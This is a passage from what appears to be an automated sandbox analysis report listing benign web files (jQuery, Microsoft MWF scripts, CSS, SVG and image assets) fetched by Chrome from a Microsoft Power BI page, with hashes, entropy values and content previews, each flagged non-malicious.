                                                                                                                                                                                                          Entropy (8bit):4.53925643908527
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:tSsg7eeMXX3/4WKtr0hi6QIG0LHDiX+JLBJ:csMedHgWKtJEGYjC+JLBJ
                                                                                                                                                                                                          MD5:42FFFAB3ACD04EA132F8C11D5E26059F
                                                                                                                                                                                                          SHA1:66A844D51A5ED1A66DDB733216A7A2EB25A5729F
                                                                                                                                                                                                          SHA-256:2F495FCAD3C118DBB2E28E094960E942974B43BDA1A9F1243CBA290DADFF0D1D
                                                                                                                                                                                                          SHA-512:10A8A51FC663D18FBB7AE39B01DB347CF383EE60A2FB5F758589C06BBD2FAD7A9C2B0E5C54639AC1EDA35426A646458E74F46944C1551E43AA6FCD6B4640DC3C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:(() => {. /** Create ocrReimagine namespace */. if (!window.ocrReimagine) {. window.ocrReimagine = {};. }.. /** Create Market Selector module namespace */. if (!window.ocrReimagine.MarketSelector) {. window.ocrReimagine.MarketSelector = {};. }.. const cookieExpiryDays = 30;. const cookieKey = 'PMGSKUMarketCk';. /** @type {MarketSelector[]} */. const instances = [];. const queryParamKey = 'market';.. /**. * CSS selector.. * @enum {string}. */. const Selector = {. AFFECTED: '[data-oc-market-selector]',. DATA_MOUNT: '[data-mount="market-selector"]',. FW_LINKS: '[data-regenerate-fwlink="true"]',. SELECT_MENU: '.custom-select-input'. };.. /**. * JS event name.. * @enum {string}. */. const EventName = {. ON_INIT: 'onInit',. ON_REFRESHED: 'onRefreshed',. ON_REMOVE: 'onRemove',. ON_SELECT: 'onSelect',. ON_UPDATE: 'onUpdate'. };.. /**. *
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):414236
                                                                                                                                                                                                          Entropy (8bit):5.24862189846503
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:hkbWIpN7sDiZg2dySA9skOF3Y3qeRTSB1DkCXW+dlVmCK3RMW7dzc:KbWIpN7+sn3QSB1DkCXW+dlVmCK3Z5w
                                                                                                                                                                                                          MD5:AA971C763DEED05B0FBB2CF7FE1FF4D7
                                                                                                                                                                                                          SHA1:AADCDBF89469A582EE57EE999BE80BD405624B35
                                                                                                                                                                                                          SHA-256:E331AFC6CAF89D878B2CF22C4B8777AD2C97ADB5D555AE060CF308DAA65BCB84
                                                                                                                                                                                                          SHA-512:18DFFB73F0EE8AD2B0D965DF37B26187D8A869737D36C713AF31E9202A2C55E97D27B830A85DD1A9C8FE8A1ABBACF7E6D72FC4DFEF65B029B9BF70A1133DAFDE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:!function(){"use strict";var M,R,hr={954:function(M,R,f){f.d(R,{X:function(){return F}});var y=f(519),v=f(589);class F extends y.xQ{constructor(w){super(),this._value=w}get value(){return this.getValue()}_subscribe(w){var A=super._subscribe(w);return A&&!A.closed&&w.next(this._value),A}getValue(){if(this.hasError)throw this.thrownError;if(this.closed)throw new v.N;return this._value}next(w){super.next(this._value=w)}}},149:function(M,R,f){f.d(R,{P:function(){return g}});var y=f(894),F=f(118),d=f(578),A=f(146);var g=(()=>{class T{constructor(b,Z,Q){this.kind=b,this.value=Z,this.error=Q,this.hasValue="N"===b}observe(b){switch(this.kind){case"N":return b.next&&b.next(this.value);case"E":return b.error&&b.error(this.error);case"C":return b.complete&&b.complete()}}do(b,Z,Q){switch(this.kind){case"N":return b&&b(this.value);case"E":return Z&&Z(this.error);case"C":return Q&&Q()}}accept(b,Z,Q){return b&&"function"==typeof b.next?this.observe(b):this.do(b,Z,Q)}toObservable(){switch(this.kind){c
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2503
                                                                                                                                                                                                          Entropy (8bit):5.408295137334717
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:7x8wH+sDe1ByFHKTLvn2KLzKSLDREHOaH3umbHOaH3u/xRHapQbHaJNWHagfq:l8weP1ByXiC/n/qxRFbKWE
                                                                                                                                                                                                          MD5:DD3F89BA65C6149AB84C5D6BFDEEBAEA
                                                                                                                                                                                                          SHA1:6434E0FCA135A582C3232D4991D6EA3D31F58C24
                                                                                                                                                                                                          SHA-256:EAFF6FCBB1CD09AFDA8669C5B637B7F6D107D48F04562FAB6383B31FEEE2E6F0
                                                                                                                                                                                                          SHA-512:B8511E0F1312B1A0C2E4D528BD135129C9C317D0893997084C40758E9654CA82DB28547F11BA0DEC5DC69C259B7E2AB04ED923BF32A29CEF4954C223EEC5B648
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="96" height="96" viewBox="0 0 96 96" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0)">..<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="12" y="0" width="72" height="96">..<path d="M52 4C52 1.79086 53.7909 0 56 0H80C82.2091 0 84 1.79086 84 4V92C84 94.2091 82.2091 96 80 96H16C13.7909 96 12 94.2091 12 92V52C12 49.7909 13.7909 48 16 48H32.0001V28C32.0001 25.7909 33.791 24 36.0001 24H52V4Z" fill="white"/>..</mask>..<g mask="url(#mask0)">..<path d="M83.9998 0L83.9998 96H51.9998L51.9998 0H83.9998Z" fill="url(#paint0_linear)"/>..<g filter="url(#filter0_f)">..<path d="M64 28.4V96.4H32V24.4H60C62.2091 24.4 64 26.1909 64 28.4Z" fill="black" fill-opacity="0.2"/>..</g>..<g filter="url(#filter1_f)">..<path d="M64 30V98H32V26H60C62.2091 26 64 27.7909 64 30Z" fill="black" fill-opacity="0.18"/>..</g>..<path d="M64 28V96H32V24H60C62.2091 24 64 25.7909 64 28Z" fill="url(#paint1_linear)"/>..<path d="M11.9998 48V96H43.9998V52C43.9998 49.7909 42.2089 48
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):89501
                                                                                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):175
                                                                                                                                                                                                          Entropy (8bit):4.68043398329258
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
                                                                                                                                                                                                          MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                                                                                                          SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                                                                                                          SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                                                                                                          SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (366)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1904
                                                                                                                                                                                                          Entropy (8bit):4.802036868832552
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:nl6d5pMwWkcphd5pMwW1qFRFvrukF0gx5eg6eZ3DrvvBuWky86q8HqouQN:lK5m4Ub5m4jvqyVx58eZvgyFqWqy
                                                                                                                                                                                                          MD5:305E80CB22D0F14E474C408C181CB792
                                                                                                                                                                                                          SHA1:8B946E3AD049A39E3BBC925B1D40BBE2F2A7E2B6
                                                                                                                                                                                                          SHA-256:A8FB92359BE5D0FB839DED898756E674A74C9A52DA8340431C2CF24B05AA43C5
                                                                                                                                                                                                          SHA-512:4F398BC8323454C5213EF37A5425A7FB114CE251A8C63C5112001DE1879EA23BBBD8A0C96DA78B7F189C659D63AFE273D90833DB464AEDBA98F6F32EF98BE8D9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing-templates/sku.min.ACSHASH305e80cb22d0f14e474c408c181cb792.js
                                                                                                                                                                                                          Preview:'use strict';function getSkuMarkup(a,c){let b=a.discountedTextTemplate;a.isDiscounted&&b&&(b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.ListPriceKey,c.sku.displayListPrice),b=b.replace(window.ocReimagine.ProductPriceModule.ProductPricingConstants.Parameters.ScreenReader.MsrpKey,c.sku.displayMSRPPrice));const d=`. <div . class="sku__pricing-discount">. <span class="oc-displayMSRPPrice">${c.sku.displayMSRPPrice}</span>. </div>. `,e=`. <div class="sku__detail-recurrence">. <span class="oc-displayUnit">${a.displayUnitMap[c.productId]}. </span>. </div>. `;return`. <div class="sku__title" data-ocr-pricing-render="title">. <h3 class="oc-product-title">${a.renderTitle}</h3>. </div>. <div class="sku__paragraph" data-ocr-pricing-content="paragraph"></div>. ${a.isDiscounted?`. <p class="sr-only" data-ocr-pricing-render="sc
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):49911
                                                                                                                                                                                                          Entropy (8bit):7.994516776763163
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                                                                                                          MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                                                                                                          SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                                                                                                          SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                                                                                                          SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x930, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):18604
                                                                                                                                                                                                          Entropy (8bit):7.990135849132951
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:384:LIgXYYQEmuGCzJv/Y8vqvyRkp9AlH8i6l5UOJiPXXYpD9xxlB/9XU808:sYuuBztE3wOsPgJLB9P
                                                                                                                                                                                                          MD5:21BCC4279E8A443322B6BBBB647C9737
                                                                                                                                                                                                          SHA1:A5B5A0D621766F730DCFCFA45349F9D0E592AD25
                                                                                                                                                                                                          SHA-256:BAA234E9220B0B237F6A2D2FCA548D743C15B410969FA9B76B6B5445DAA64DC8
                                                                                                                                                                                                          SHA-512:0A89ABC05851A4C14F3437FA765DFB5EA6A62571E689AEA5209C5A354DCD688CF35F4AE8620648262351D0F8480BB40B3B5CC482AD7CCBFDE6A5EBA25262B473
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:RIFF.H..WEBPVP8 .H......*....>.............s..........,j......Y..?.....h............m/....O..o?..~z........g.........J.}...h........Xr.'.\..<J.|T..X.u.....a.\...?p...nU.......J...'n..k4TPxE&..e.v|4...DxRx.]..?.y-..dL.&~...K.GW.O......!..BI.ui...n.d.R..eu.cv......'..E..q.[.[.;..'.....k9...?~..E.[-..m..G..{!Z.... \.;..i.%.|46.(.m...-h.E0.2..!.B...K.Y..b{.b.@.D}.+&...:.a.hAG..^3q1.)...u?..-.:.$.~.!YB...5[sp...}Wh....#....r..Z.,.4..".e.o.e.......Oqi.;......K..8..=.qd.AH.n.v..............}.<.#..B.......Wk9....^.g*,BC*..v.....vw.L".v...}.(. R.mX...#.E.M...C\...V>.@(+...[.;.qd.....P........#.......N..y..>..J..}=.....4 .8.OK.........=..R3.".t>...v1IR.......Un.)3......$.B..B).Y,..o.$/n...M..J\......&c.q.?Q...a...\T..>..h.w..q....T.h.p......(.A:<P..JO"..........R]..o.w...`..+.|..(0o'.... .S..h..!pS..w.3.V~.`...0.o.m.....L.)..V.g..'0..]..B..V.}..Z....\#.2...=.a.S...p...=Sk.... . ..&.u..H+...&2..x......l......>.-.A.....8Z..j...{.K......I
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):9316
                                                                                                                                                                                                          Entropy (8bit):4.267140948442776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:7GrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubephg2:qrzjDYq5FEFLjRJpKJxWrqhKGXy83Y3N
                                                                                                                                                                                                          MD5:2B143BED0FF34BC70BC0703346F70E08
                                                                                                                                                                                                          SHA1:7FB14A8842293FD041C7C138285AC2F822AC4B4C
                                                                                                                                                                                                          SHA-256:C35BBDEE4A46BFBF552989E1126E1F09B454EB3DC2523376C38964BF6128BE86
                                                                                                                                                                                                          SHA-512:46BBF881243EC3C27046FCB66F9D8412B459CC7B6DA1ABF0DCB5F70D578F57E9A88D52431753B65F851892055AC17EDD9446E11BA67D7B0DA80B2B2615F67688
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-reimagine-base.min.ACSHASH2b143bed0ff34bc70bc0703346f70e08.js
                                                                                                                                                                                                          Preview:// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEnabled() {. return !!(window.ocrReimagine?.Icon?.getInstances());. }.. /**. * Initialize popover elements with the class 'popover-rte-mount' by looking up inside the target element or entire document.. */. initializePopoverRichTextPlugin() {. if (!this.isPopoverComponentEnabled()) {. return;. }.. // Get all popover rich text elements.. const popoverRichTextElements = this.getPopoverRichTextElements();.. if (!popo
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6824)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):404817
                                                                                                                                                                                                          Entropy (8bit):5.1585371571664815
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:3LuveJs8WV1mYCuwo0hjrRJVmxle1hUGS56XNXf+d78v0VS02no0bPxG:3LuveJs8WV1mYCuwo0hjrRJVmxle1hUh
                                                                                                                                                                                                          MD5:2A1DD069ED658EF34D088CE592EA3E99
                                                                                                                                                                                                          SHA1:62626083123BF29814DAA8BE6E0F1FCF76E40E0B
                                                                                                                                                                                                          SHA-256:7EFD2F081FD4E400F779D83139FDF6DD9FA22619D4B2118371900044F958AEAB
                                                                                                                                                                                                          SHA-512:6335F9C6AE1558765A1A0BF15141B650BDD4BD2F3A11918B7C655C81DA3B12203E453E2EE01E7206DD782DFEB492E049561D1896647ED15A31A31A308454DA52
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/en-us/power-platform/products/power-bi/
                                                                                                                                                                                                          Preview:<!DOCTYPE HTML> <html lang="en-US" dir="ltr"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <meta http-equiv="x-ua-compatible" content="ie=edge"/> <link rel="SHORTCUT ICON" href="/favicon.ico?v2" type="image/x-icon"/> <meta name="robots" content="index, follow"/> <meta name="template" content="reimagine---product-detail-3"/> <meta name="awa-canvasType" content="web"/> <meta name="awa-isTented" content="false"/> <meta name="awa-pgtmp" content="reimagine---product-detail-3"/> <meta name="awa-pageType" content="Microsoft Power Platform"/> <meta name="awa-market" content="en-us"/> <meta name="awa-cms" content="AEM"/> <meta name="awa-enabledFeatures" content="contentbackfillgenerate;esiproductcards;feature-controlled-mwf;uhf-ms-io-endpoint;uhf-esi-cv;uhf-esi-cache;fraud-greenid;contentsquare;mediapixel;holiday-themer;lazyload-static-components;clientlibDefer;upsellEnabled;contentbackfillpkgdelete;healthcheck;co
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (510)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1973
                                                                                                                                                                                                          Entropy (8bit):4.4914538760871165
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:xCgigRgQgGKgeg5Cgfgy7gBgugDgBCgRgogvg+gdg27eG8T5aW:IlmvhK5TQX7WpMV8V2HgDeG8taW
                                                                                                                                                                                                          MD5:81B1EF0C4A6B80454291234FCD6E45B0
                                                                                                                                                                                                          SHA1:1353F3119D378FFB222149AE19755423EF5347BE
                                                                                                                                                                                                          SHA-256:B05D865A37D5EFC60E028BC9FBC6B63459C78D21B0B70B3797AC97C1AD9BA88D
                                                                                                                                                                                                          SHA-512:6409931AF06BAE75E4CFC57FF2B877915404A9D805F8C9076390C4BC8FF634BA96B2ED561FCC4E57869110E62BE05AB75A1578E7935CEC9605EAA77C893643AD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-reimagine-base.min.ACSHASH81b1ef0c4a6b80454291234fcd6e45b0.css
                                                                                                                                                                                                          Preview:[data-oc-token-text]{display:contents}..editorial-article--chapter .editorial-article__slot .block-heading h1,.editorial-article--chapter .editorial-article__slot .block-heading h2,.editorial-article--chapter .editorial-article__slot .block-heading h3,.editorial-article--chapter .editorial-article__slot .block-heading h4,.editorial-article--chapter .editorial-article__slot .block-heading h5,.editorial-article--chapter .editorial-article__slot .block-heading p{margin-block:var(--root-spacing-xl)}..editorial-article--chapter .editorial-article__slot .block-heading h1:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h2:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h3:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h4:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h5:first-child,.editorial-article--chapter .editorial-article__slot .block-heading p:first-child{ma
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):963242
                                                                                                                                                                                                          Entropy (8bit):5.080074666196109
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:/5PGHDYhNsbgvCmSuSuhF7bmGQmbikKhMMmZJlHBQRknsRwRknsRRXNtaBnpwnam:/5PGHDYhNsbgvCmSuSfmZJlHBQRknsRM
                                                                                                                                                                                                          MD5:8AC768BFE5A1FA4D2BD0686BD66C7020
                                                                                                                                                                                                          SHA1:18DD92F529CF99B3EA01D5F21A1C6A33962C6ABC
                                                                                                                                                                                                          SHA-256:6F38791B83C5DD5289CEB007431B066BCE468C02CB0FE4C667BE911279880E83
                                                                                                                                                                                                          SHA-512:AAF77A888D0CFF5234B8E930F8910138E7530788D19EEDF7EF0DA67E9A35EE76073AAD9124374E7257B8AAEB0B22E35935A57DAEE5B9E28FAA6D7DDBA739EB30
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/powerbiportal.bundle.min.18dd92f529cf99b3ea01.css
                                                                                                                                                                                                          Preview:button,input[type=button]{font-family:'Segoe UI Semibold',wf_segoe-ui_semibold,helvetica,arial,sans-serif;background-image:none;box-shadow:none;background-color:var(--button-default-base-fill-color,#eaeaea);padding:6px 18px 6px 18px;border:2px solid var(--button-default-base-fill-color,#eaeaea);border-radius:0;text-shadow:none;font-size:14px;width:auto;line-height:16px;white-space:nowrap;color:var(--button-default-content-color,#000);transition:color .2s,background-color .2s,border-color .2s}button:active:hover,button:focus,button:focus:hover,button:hover,input[type=button]:active:hover,input[type=button]:focus,input[type=button]:focus:hover,input[type=button]:hover{border-color:var(--button-default-hover-content-color,#000);background-color:var(--button-default-hover-fill-color,#f4f4f4);color:var(--button-default-hover-content-color,#000)}button:active,input[type=button]:active{background-color:var(--button-default-active-fill-color,#666);border-color:var(--button-default-active-fill-
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (1999)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):419611
                                                                                                                                                                                                          Entropy (8bit):4.980054379765907
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:qDxREkZQKdaFA/RIc3f+u2wc/WVKSjdJjfMNlR48tmbK+2pA9XDTotHd9:uREkZQKdaFA/RIc3f+Pwc/6KSj7fMNl/
                                                                                                                                                                                                          MD5:3CB55A1B7E29CABDED7D23377524B55E
                                                                                                                                                                                                          SHA1:5731994750E31D9CD11085570630EAC99DC65845
                                                                                                                                                                                                          SHA-256:0953ECFC1629CBBB80658EEC92D00BA89058F6862E5CD742A419412207088D3C
                                                                                                                                                                                                          SHA-512:646E5BDE377A885E321790BDF16E07324754C5670B707F1BE4BC11208E2F2E2644189CECE32BFB9C86D51C503F37053D54E1CCC627ECA92D29A20EF2955A69FB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH3cb55a1b7e29cabded7d23377524b55e.js
                                                                                                                                                                                                          Preview:./*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';.. const ViewPort = {. XS: 0,. SM: 540,. MD: 860,. LG: 1084,. XL: 1400. };. const DetectionUtil = {. /* eslint-disable no-useless-escape, unicorn/better-regex */. detectMobile(includeTabletCheck) {. if (includeTabletCheck === void 0) {. includeTabletCheck = false;. }.. /**. * detect if mobile and/or tablet device. * returns bool. */. let check = false;.. if (includeTabletC
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (1999)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):419611
                                                                                                                                                                                                          Entropy (8bit):4.980054379765907
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:qDxREkZQKdaFA/RIc3f+u2wc/WVKSjdJjfMNlR48tmbK+2pA9XDTotHd9:uREkZQKdaFA/RIc3f+Pwc/6KSj7fMNl/
                                                                                                                                                                                                          MD5:3CB55A1B7E29CABDED7D23377524B55E
                                                                                                                                                                                                          SHA1:5731994750E31D9CD11085570630EAC99DC65845
                                                                                                                                                                                                          SHA-256:0953ECFC1629CBBB80658EEC92D00BA89058F6862E5CD742A419412207088D3C
                                                                                                                                                                                                          SHA-512:646E5BDE377A885E321790BDF16E07324754C5670B707F1BE4BC11208E2F2E2644189CECE32BFB9C86D51C503F37053D54E1CCC627ECA92D29A20EF2955A69FB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:./*!. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :. typeof define === 'function' && define.amd ? define(['exports'], factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';.. const ViewPort = {. XS: 0,. SM: 540,. MD: 860,. LG: 1084,. XL: 1400. };. const DetectionUtil = {. /* eslint-disable no-useless-escape, unicorn/better-regex */. detectMobile(includeTabletCheck) {. if (includeTabletCheck === void 0) {. includeTabletCheck = false;. }.. /**. * detect if mobile and/or tablet device. * returns bool. */. let check = false;.. if (includeTabletC
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3116
                                                                                                                                                                                                          Entropy (8bit):4.431505373285771
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:e2rIqX/nyqHytWO/+75xy17A6d/X226/YU3/xopLk/OEBlKj/v4UPnxzgNar4n8u:lIAvyqSRcK66dODQhYUosRZg4hpRV6
                                                                                                                                                                                                          MD5:B884EF4864D6867BD00AA4A7A5CFB368
